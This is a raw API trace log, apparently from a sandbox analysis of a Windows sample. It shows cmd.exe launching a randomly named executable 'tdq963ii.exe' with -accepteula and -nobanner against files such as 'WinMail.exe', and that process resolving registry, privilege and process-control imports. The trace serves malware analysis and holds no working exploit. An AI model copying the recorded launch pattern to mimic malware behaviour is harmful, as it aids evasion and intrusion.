[0242.678] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0242.679] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0242.679] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0242.679] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0242.679] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0242.679] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0242.679] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0242.679] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0242.679] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0242.679] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0242.679] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0242.679] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0242.679] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0242.679] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0242.679] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0242.679] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0242.679] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0242.679] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0242.679] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0242.679] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0242.679] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0242.679] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0242.680] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0242.680] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0242.680] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0242.680] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0242.680] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0242.680] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0242.680] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0242.680] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0242.680] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0242.680] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0242.680] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0242.680] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0242.680] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0242.680] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0242.680] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0242.680] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0242.680] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0242.680] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0242.680] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0242.680] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0242.680] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0242.680] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0242.680] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0242.681] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0242.682] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0242.682] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0242.682] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0242.682] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0242.682] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0242.682] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0242.682] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0242.682] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0242.682] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0242.682] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0242.682] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0242.682] _wcsicmp (_String1="tdq963ii.exe", _String2="FOR") returned 14 [0242.682] _wcsicmp (_String1="tdq963ii.exe", _String2="IF") returned 11 [0242.682] _wcsicmp (_String1="tdq963ii.exe", _String2="REM") returned 2 [0242.683] GetProcessHeap () returned 0x450000 [0242.683] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x210) returned 0x4624f0 [0242.683] GetProcessHeap () returned 0x450000 [0242.683] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x6c) returned 0x462708 [0242.683] _wcsnicmp (_String1="tdq9", _String2="cmd ", _MaxCount=0x4) returned 17 [0242.684] GetProcessHeap () returned 0x450000 [0242.684] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x418) returned 0x462780 [0242.684] SetErrorMode (uMode=0x0) returned 0x0 [0242.684] SetErrorMode (uMode=0x1) returned 0x0 [0242.684] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x462788, lpFilePart=0x22f070 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x22f070*="Desktop") returned 0x25 [0242.684] SetErrorMode (uMode=0x0) returned 0x1 [0242.684] GetProcessHeap () returned 0x450000 [0242.684] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x462780, Size=0x6e) returned 0x462780 [0242.684] GetProcessHeap () returned 0x450000 [0242.684] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x462780) returned 0x6e [0242.684] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0242.684] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0242.684] GetProcessHeap () returned 0x450000 [0242.685] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x120) returned 0x4627f8 [0242.685] GetProcessHeap () returned 0x450000 [0242.685] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x238) returned 0x462920 [0242.697] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0242.698] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x22ee0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee0c) returned 0x462ad0 [0242.698] GetProcessHeap () returned 0x450000 [0242.698] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x462b10 [0242.698] FindClose (in: hFindFile=0x462ad0 | out: hFindFile=0x462ad0) returned 1 [0242.698] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0242.698] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0242.698] GetConsoleTitleW (in: lpConsoleTitle=0x22f2e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0242.699] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f16c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f234 | out: lpAttributeList=0x22f16c, lpSize=0x22f234) returned 1 [0242.699] UpdateProcThreadAttribute (in: lpAttributeList=0x22f16c, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f22c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f16c, lpPreviousValue=0x0) returned 1 [0242.699] GetStartupInfoW (in: lpStartupInfo=0x22f128 | out: lpStartupInfo=0x22f128*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x80, hStdError=0xb)) [0242.699] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0242.700] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula \"WinMail.exe\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x22f1c8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"WinMail.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f214 | out: lpCommandLine="tdq963ii.exe -accepteula \"WinMail.exe\" -nobanner", lpProcessInformation=0x22f214*(hProcess=0x78, hThread=0x74, dwProcessId=0x570, dwThreadId=0x648)) returned 1 [0242.999] CloseHandle (hObject=0x74) returned 1 [0243.000] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0243.000] GetProcessHeap () returned 0x450000 [0243.000] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x462d58 | out: hHeap=0x450000) returned 1 [0243.000] GetEnvironmentStringsW () returned 0x462b30* [0243.000] GetProcessHeap () returned 0x450000 [0243.000] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb7e) returned 0x467278 [0243.000] FreeEnvironmentStringsW (penv=0x462b30) returned 1 [0243.000] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0244.046] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x22f108 | out: lpExitCode=0x22f108*=0x1) returned 1 [0244.046] CloseHandle (hObject=0x78) returned 1 [0244.046] _vsnwprintf (in: _Buffer=0x22f250, _BufferCount=0x13, _Format="%08X", _ArgList=0x22f114 | out: _Buffer="00000001") returned 8 [0244.046] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0244.046] GetProcessHeap () returned 0x450000 [0244.046] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x467278 | out: hHeap=0x450000) returned 1 [0244.046] GetEnvironmentStringsW () returned 0x462b30* [0244.046] GetProcessHeap () returned 0x450000 [0244.046] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb7e) returned 0x467278 [0244.046] FreeEnvironmentStringsW (penv=0x462b30) returned 1 [0244.046] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0244.046] GetProcessHeap () returned 0x450000 [0244.046] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x467278 | out: hHeap=0x450000) returned 1 [0244.046] GetEnvironmentStringsW () returned 0x462b30* [0244.046] GetProcessHeap () returned 0x450000 [0244.046] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb7e) returned 0x467278 [0244.046] FreeEnvironmentStringsW (penv=0x462b30) returned 1 [0244.046] GetProcessHeap () returned 0x450000 [0244.046] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4600b0 | out: hHeap=0x450000) returned 1 [0244.047] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f16c | out: lpAttributeList=0x22f16c) [0244.047] _get_osfhandle (_FileHandle=1) returned 0x80 [0244.047] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0244.047] _get_osfhandle (_FileHandle=1) returned 0x80 [0244.047] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0244.047] _get_osfhandle (_FileHandle=0) returned 0x3 [0244.047] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0244.047] SetConsoleInputExeNameW () returned 0x1 [0244.047] GetConsoleOutputCP () returned 0x1b5 [0244.047] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0244.048] SetThreadUILanguage (LangId=0x0) returned 0x409 [0244.048] exit (_Code=1) Process: id = "266" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x17a52000" os_pid = "0x3f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "262" os_parent_pid = "0x5d8" cmd_line = "tdq963ii.exe -accepteula \"Shorthand.jtp\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 882 os_tid = 0x614 [0242.663] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0242.663] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0242.664] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0242.664] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0242.664] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0242.664] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0242.664] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0242.664] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0242.664] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0242.664] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0242.664] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0242.665] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0242.665] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0242.665] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0242.665] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0242.665] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0242.665] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0242.665] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0242.665] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0242.665] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0242.665] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0242.666] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0242.666] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0242.666] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0242.666] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0242.666] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0242.666] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0242.666] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0242.666] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0242.666] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0242.667] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0242.667] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0242.667] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0242.667] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0242.667] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0242.667] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0242.667] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0242.667] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0242.667] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0242.667] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0242.668] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0242.668] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0242.668] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0242.668] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0242.668] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0242.668] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0242.668] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0242.668] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0242.668] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0242.669] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0242.669] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0242.669] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0242.669] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0242.669] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0242.669] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0242.669] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0242.669] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0242.669] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0242.670] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0242.670] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0242.670] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0242.670] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0242.670] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0242.670] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0242.670] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0242.670] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0242.670] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0242.670] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0242.671] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0242.671] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0242.671] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0242.671] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0242.671] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0242.671] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0242.963] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0242.963] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0242.963] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0242.963] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0242.963] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0242.964] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0242.964] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0242.964] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0242.964] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0242.964] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0242.965] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0242.965] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0242.965] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0242.965] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0242.965] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0242.966] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0242.968] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0242.969] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0242.969] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0242.969] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0242.970] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0242.970] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0242.970] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0242.970] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0242.971] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0242.971] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0242.971] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0242.971] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0242.971] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0242.971] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0242.972] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0242.972] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0242.972] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0242.973] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0242.973] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0242.973] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0242.973] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0242.974] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0242.974] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0242.974] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0242.974] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0242.975] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0242.975] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0242.975] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0242.976] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0242.976] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0242.976] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0242.976] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0242.976] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0242.977] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0242.977] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0242.977] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0242.977] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0242.979] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0242.980] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x46996c40, dwHighDateTime=0x1d68287)) [0242.980] GetCurrentThreadId () returned 0x614 [0242.980] GetCurrentProcessId () returned 0x3f8 [0242.980] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=36331889766) returned 1 [0242.980] GetProcessHeap () returned 